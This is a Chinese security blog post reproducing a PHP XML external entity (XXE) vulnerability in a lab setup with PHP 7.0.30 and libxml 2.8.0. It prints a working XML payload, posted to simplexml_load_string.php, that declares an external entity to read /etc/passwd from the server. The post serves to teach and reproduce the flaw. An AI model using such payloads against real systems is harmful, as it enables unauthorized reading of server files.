PHP外部实体注入漏洞复现

0800

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。

环境介绍

php7.0.30

libxml 2.8.0

图片[1]-PHP外部实体注入漏洞复现-吾爱博客

靶机ip:http://192.168.50.134:8080/

漏洞复现

WWW目录下有4个文件,dom.phpSimpleXMLElement.phpsimplexml_load_string.php均可触发XXE漏洞

图片[2]-PHP外部实体注入漏洞复现-吾爱博客
图片[3]-PHP外部实体注入漏洞复现-吾爱博客

Payload

POST /simplexml_load_string.php

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
图片[4]-PHP外部实体注入漏洞复现-吾爱博客
温馨提示: 本文最后更新于2022-05-30,某些文章具有时效性,若有错误或已失效,请在下方 留言
© 版权声明
吾爱博客|AYFRE.COM 版权所有,转载请标明出处。
THE END
网络安全
喜欢就支持一下吧❀
点赞0投币 分享
Monarchdos的头像-吾爱博客
搭建能够自动采集的漫画网站-吾爱博客
搭建能够自动采集的漫画网站
搭建能够自动采集的漫画网站
2019-6-23 1.4W+
Journal工作原理-吾爱博客
Journal工作原理
Journal工作原理
2019-5-17 1.1W+
SSH – Putty-吾爱博客
SSH – Putty
SSH – Putty
2021-3-31 1.1W+
FAT表详解—图文详解——重要记录-吾爱博客
FAT表详解—图文详解——重要记录
FAT表详解—图文详解——重要记录
2018-4-7 1W+
手机QQ自定义设置5G在线状态-吾爱博客
手机QQ自定义设置5G在线状态
手机QQ自定义设置5G在线状态
2019-8-14 1W+
宝塔面板安装Nginx_Pagespeed给网站加速-吾爱博客
宝塔面板安装Nginx_Pagespeed给网站加速
宝塔面板安装Nginx_Pagespeed给网站加速
2019-8-15 6165
相关推荐
浅谈CSRF攻击方式-吾爱博客
浅谈CSRF攻击方式
浅谈CSRF攻击方式
2018-12-25 1006
通过公钥解密密文思路(256bits RSA)-吾爱博客
通过公钥解密密文思路(256bits RSA)
通过公钥解密密文思路(256bits RSA)
2021-8-22 503
云影密码-吾爱博客
云影密码
云影密码
2022-8-15 469
将二进制数值转换成二维码-吾爱博客
将二进制数值转换成二维码
将二进制数值转换成二维码
2023-3-28 385
最安全的 PHP 密码加密方法-吾爱博客
最安全的 PHP 密码加密方法
最安全的 PHP 密码加密方法
2021-8-24 319
RSA 256Bit Known p q e Decrypt-吾爱博客
RSA 256Bit Known p q e Decrypt
RSA 256Bit Known p q e Decrypt
2021-8-22 277
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

默认头像
搜索
开启精彩搜索
xiaoluobo的头像-吾爱博客

xiaoluobo2023-9-250

n1234
白露饮尘霜的头像-吾爱博客

白露饮尘霜2023-9-120

谢谢博主分享!
星期四的头像-吾爱博客

星期四2023-9-50

这个不错
星期四的头像-吾爱博客

星期四2023-9-50

这个不错
用户57415624的头像-吾爱博客

用户574156242023-9-20

xuexixuexi
xiaochen的头像-吾爱博客

xiaochen2023-8-210

谢谢分享
钟情y的头像-吾爱博客

钟情y2023-8-200

失效了好像
ε♚二 二♚з的头像-吾爱博客

ε♚二 二♚з2023-8-200

66666666666666666
标签云
鸡汤阅读采集邮件运算调试记录解析视频表白英语网络安全算法破解电影漫画源码活动油猴沟通